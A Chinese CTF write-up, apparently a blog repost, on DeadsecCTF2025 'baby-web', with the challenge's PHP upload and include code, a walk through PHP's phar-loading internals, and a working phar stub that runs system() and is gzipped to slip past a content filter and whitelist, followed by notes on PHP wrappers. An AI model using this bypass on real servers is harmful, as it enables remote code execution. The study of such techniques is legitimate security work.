news 2026/4/28 12:12:06

include文件包含及c底层调试

作者头像

张小明

前端开发工程师

1.2k 24
文章封面图
include文件包含及c底层调试

做题笔记:

DeadsecCTF2025 baby-web

ubuntu虚拟环境下安装中间件和php,这里我用的nginx和php8.3

在nginx的html目录下放两个php文件

update.php:

<?php session_start(); error_reporting(0); ​ $allowed_extensions = ['zip', 'bz2', 'gz', 'xz', '7z']; $allowed_mime_types = [ 'application/zip', 'application/x-bzip2', 'application/gzip', 'application/x-gzip', 'application/x-xz', 'application/x-7z-compressed', ]; ​ ​ function filter($tempfile) { $data = file_get_contents($tempfile); if ( stripos($data, "__HALT_COMPILER();") !== false || stripos($data, "PK") !== false || stripos($data, "<?") !== false || stripos(strtolower($data), "<?php") !== false ) { return true; } return false; } ​ if (!isset($_SESSION['dir'])) { $_SESSION['dir'] = random_bytes(4); } ​ $SANDBOX = getcwd() . "/uploads/" . md5("supersafesalt!!!!@#$" . $_SESSION['dir']); if (!file_exists($SANDBOX)) { mkdir($SANDBOX); } ​ if ($_SERVER["REQUEST_METHOD"] == 'POST') { if (is_uploaded_file($_FILES['file']['tmp_name'])) { if (filter($_FILES['file']['tmp_name']) || !isset($_FILES['file']['name'])) { die("Nope :<"); } ​ // mimetype check $finfo = finfo_open(FILEINFO_MIME_TYPE); $mime_type = finfo_file($finfo, $_FILES['file']['tmp_name']); finfo_close($finfo); ​ if (!in_array($mime_type, $allowed_mime_types)) { die('Nope :<'); } ​ // ext check $ext = strtolower(pathinfo(basename($_FILES['file']['name']), PATHINFO_EXTENSION)); ​ if (!in_array($ext, $allowed_extensions)) { die('Nope :<'); } ​ if (move_uploaded_file($_FILES['file']['tmp_name'], "$SANDBOX/" . basename($_FILES['file']['name']))) { echo "File upload success!"; } } } ?> ​ <form enctype='multipart/form-data' action='upload.php' method='post'> <input type='file' name='file'> <input type="submit" value="upload"></p> </form>

index.php:

<?php session_start(); error_reporting(0); ​ if (!isset($_SESSION['dir'])) { $_SESSION['dir'] = random_bytes(4); } ​ if (!isset($_GET['url'])) { die("Nope :<"); } ​ $include_url = basename($_GET['url']); $SANDBOX = getcwd() . "/uploads/" . md5("supersafesalt!!!!@#$" . $_SESSION['dir']); ​ if (!file_exists($SANDBOX)) { mkdir($SANDBOX); } ​ if (!file_exists($SANDBOX . '/' . $include_url)) { die("Nope :<"); } ​ if (!preg_match("/\.(zip|bz2|gz|xz|7z)/i", $include_url)) { die("Nope :<"); } ​ @include($SANDBOX . '/' . $include_url); ?> 我们在这里的主要的限制是在update文件的白名单以及文件内容的过滤: //文件类型的白名单 $allowed_extensions = ['zip', 'bz2', 'gz', 'xz', '7z']; $allowed_mime_types = [ 'application/zip', 'application/x-bzip2', 'application/gzip', 'application/x-gzip', 'application/x-xz', 'application/x-7z-compressed', ]; //文件内容的过滤 if ( stripos($data, "__HALT_COMPILER();") !== false || stripos($data, "PK") !== false || stripos($data, "<?") !== false || stripos(strtolower($data), "<?php") !== false ) { return true;

此处杜绝了伪协议的使用

@include($SANDBOX . '/' . $include_url);

那么这题只有深入底层才能解出可能,当我们include一个文件的时候,会调用一个叫做 compile_filename 的方法:

zend_op_array compile_filename(int type, zend_string filename) { zend_file_handle file_handle; zend_op_array retval; zend_string opened_path = NULL; zend_stream_init_filename_ex(&file_handle, filename); retval = zend_compile_file(&file_handle, type); if (retval && file_handle.handle.stream.handle) { if (!file_handle.opened_path) { file_handle.opened_path = opened_path = zend_string_copy(filename); } zend_hash_add_empty_element(&EG(included_files), file_handle.opened_path); if (opened_path) { zend_string_release_ex(opened_path, 0); } } zend_destroy_file_handle(&file_handle); return retval; }

继续定位到phar对应的编译方法,需要看到 phar_compile_file :

可以看到当他判断到 strstr(ZSTR_VAL(file_handle filename), ".phar") ,也就是发现文件名 中 包 含 字 符 串 .phar , 会 调 用 phar_open_from_filename , 继 续 跟 phar_open_from_filename :

可以看到这里调用了一个叫 phar_open_from_fp 的东西,继续跟一下:

直接让ai解释一下: phar_open_from_fp() 是用于从一个 php_stream (即打开的文件流)中 解析并打开一个 Phar 文件(PHP Archive)的函数:

打开 phar 文件流 ↓ 尝试 rewind 到起始位置 ↓ 是否 gzip?→ 解压 → rewind 是否 bzip2?→ 解压 → rewind 是否 zip?→ phar_parse_zipfile 是否 tar?→ phar_parse_tarfile ↓ 扫描 HALT_COMPILER(); ↓ 找到了 → phar_parse_pharfile() 找不到 → 报错并退出

由此可得,我们解题整体思路应该是:

生成了一个phar文件,然后把他打包成gz文件,当include这个gz文件时,php会默认把这个gz文件解压回phar进行解析,比如我们用下面这个代码生成一个phar文件。

<?php $phar = new Phar('exploit.phar'); $phar -> startBuffering(); $stub = <<<'STUB' <?php system('whoami'); __HALT_COMPILER(); ?> STUB; $phar->setStub($stub); $phar->addFromString('test.txt', 'test'); $phar->stopBuffering(); ?>

在打包一下,可以看到关键字已经完全消失了:

关键字已经完全消失了,而且我们此时的后缀也已经是gz了,属于白名单中。

验证:

root@zou-VMware-Virtual-Platform:/usr/local/nginx/html# /root/php-src-php-8.3.23/sapi/cli/php -S 0.0.0.0:8899

结果显示root,说明我们的文件成功上传并进行了文件包含。

c底层的调试在vscode和pwndbg上进行:


文件包含漏洞(File Inclusion Vulnerability)

通过PHP函数引入文件时,传入的文件名没有经过合理的验证,从而操作了预想之外的文件,就可能导致意外的文件泄漏甚至恶意代码注入。

文件包含漏洞环境要求

  • allow_url_fopen=On(默认为On) 规定是否允许从远程服务器或者网站检索数据

  • allow_url_include=On(php5.2之后默认为Off) 规定是否允许include/require远程文件

常见文件包含函数

php中常见的文件包含函数有以下四种:

  • include()

  • require()

  • include_once()

  • require()_once()

include与require基本是相同的,除了错误处理方面:

  • include(),只生成警告(E_WARNING),并且脚本会继续

  • require(),会生成致命错误(E_COMPILE_ERROR)并停止脚本

  • include_once()与require()_once(),如果文件已包含,则不会包含,其他特性如上

php伪协议总结

一.【file://协议】

PHP.ini:

file:// 协议在双off的情况下也可以正常使用;

allow_url_fopen :off/on

allow_url_include:off/on

file:// 用于访问本地文件系统,在CTF中通常用来读取本地文件的且不受allow_url_fopen与allow_url_include的影响

用法:file:// [文件的绝对路径和文件名]

示例:

file.php:

<?php include($_GET['file']); ?>

1.txt:

<?php phpinfo();

二.【php://协议】

条件:

不需要开启allow_url_fopen,仅php://input、 php://stdin、 php://memory 和 php://temp 需要开启allow_url_include。

php:// 访问各个输入/输出流(I/O streams),在CTF中经常使用的是php://filter和php://input,php://filter用于读取源码,php://input用于执行php代码。

参考自:http://php.net/manual/zh/wrappers.php.php#refsect2-wrappers.php-unknown-unknown-unknown-descriptioq

php://filter

读取源代码并进行base64编码输出,不然会直接当做php代码执行就看不到源代码内容了。

PHP.ini:

php://filter在双off的情况下也可以正常使用;

allow_url_fopen :off/on

allow_url_include:off/on

示例:

“include 会执行 PHP 代码” 的前提是:它读到的内容必须是“看起来像 PHP 代码”的字节流。
一旦你用 php://filter/read=convert.base64-encode 把真正的 PHP 代码提前变成了“一串看不懂的 Base64 文字”,include 就只能老老实实把这串文字吐到页面上,根本不会去执行。

php://input

可以访问请求的原始数据的只读流, 将post请求中的数据作为PHP代码执行。

PHP.ini:

allow_url_fopen :off/on

allow_url_include:on

三.【zip://, bzip2://, zlib://协议】

四.【DATA://与PHAR://】

包含APACHE日志文件

包含SESSION

包含/PROC/SELF/ENVIRON

包含临时文件

包含上传文件

总结:

1.底层调试环境pwndbg调试php8.2成功,vscode调试php8.1-dev后门成功。

2.利用phar及压缩文件绕过文件内容过滤和白名单实现成功。

3.利用docker容器环境还原后门,利用后门执行代码成功。

4.底层调试的环境和过程还需要进一步熟悉。

5.文件包含内容:日志文件包含成功,session文件包含成功。

6.临时文件包含pythone脚本需要进一步理解与运用。

版权声明: 本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若内容造成侵权/违法违规/事实不符,请联系邮箱:809451989@qq.com进行投诉反馈,一经查实,立即删除!
网站建设 2026/4/21 10:01:40

union 和 union all的区别

1、union和union all UNION对两个结果集进行并集操作&#xff0c;不包括重复行&#xff0c;相当于使用distinct关键字。而UNION ALL则对两个结果集进行并集操作&#xff0c;包括重复行&#xff0c;即所有结果全部显示&#xff0c;不管是否重复。 UNION操作会去除重复的记录&…

作者头像 李华
网站建设 2026/4/24 15:31:09

爱心公益 PPT 一键生成平台 TOP6,无需设计基础也能做

6款好用工具推荐&#xff0c;新手也能搞定爱心公益PPT一键生成 作为经常帮公益组织和校园社团做PPT的过来人&#xff0c;我太懂新手做爱心公益PPT的痛点了&#xff1a;找模板耗半天、排版没思路、素材怕侵权&#xff0c;最后熬夜做出来的效果还不尽如人意。其实现在有很多实用工…

作者头像 李华
网站建设 2026/4/25 22:58:02

中小企业必看!RFID资产管理系统,不用大投入也能高效管资产

跟不少中小企业老板和运维聊过&#xff0c;发现大家对资产管理都有个矛盾心理&#xff1a;想做好管理&#xff0c;又怕投入太多成本&#xff0c;最后得不偿失&#xff1b;放任不管&#xff0c;又总被资产混乱、盘点耗时、流失浪费等问题拖后腿。尤其是对于人员精简、预算有限的…

作者头像 李华
网站建设 2026/4/24 22:17:18

互联网大厂Java面试场景:从Spring到微服务的技术探讨

互联网大厂Java面试场景&#xff1a;从Spring到微服务的技术探讨 场景&#xff1a;互联网大厂面试现场 面试官是一位经验丰富的技术专家&#xff0c;而求职者“超好吃”则是一位刚刚准备进入互联网大厂的Java小白程序员。面试官开始了严肃而循序渐进的面试。 第一轮提问&…

作者头像 李华
网站建设 2026/4/28 4:38:26

智能体持久性记忆实战:从0到1构建双路记忆堆栈

本文介绍如何为智能体构建持久性记忆系统&#xff0c;通过双路记忆堆栈&#xff08;情节记忆语义记忆&#xff09;解决智能体健忘问题。情节记忆使用向量数据库存储对话历史&#xff0c;语义记忆使用图数据库存储结构化事实。文章详细展示了实现方法、代码构建及实际应用&#…

作者头像 李华
网站建设 2026/4/25 16:48:32

大模型学习全攻略:从零基础到AI专家的系统路线,【2026首发】AI大模型学习路线:适合新手和大学生

本文提供了从入门到高级的大模型学习完整路线&#xff0c;涵盖Python编程、数学基础、机器学习、深度学习等基础知识&#xff0c;以及自然语言处理、计算机视觉等进阶内容&#xff0c;并提供实战案例和学习资源&#xff0c;帮助小白和程序员系统掌握大模型技术&#xff0c;实现…

作者头像 李华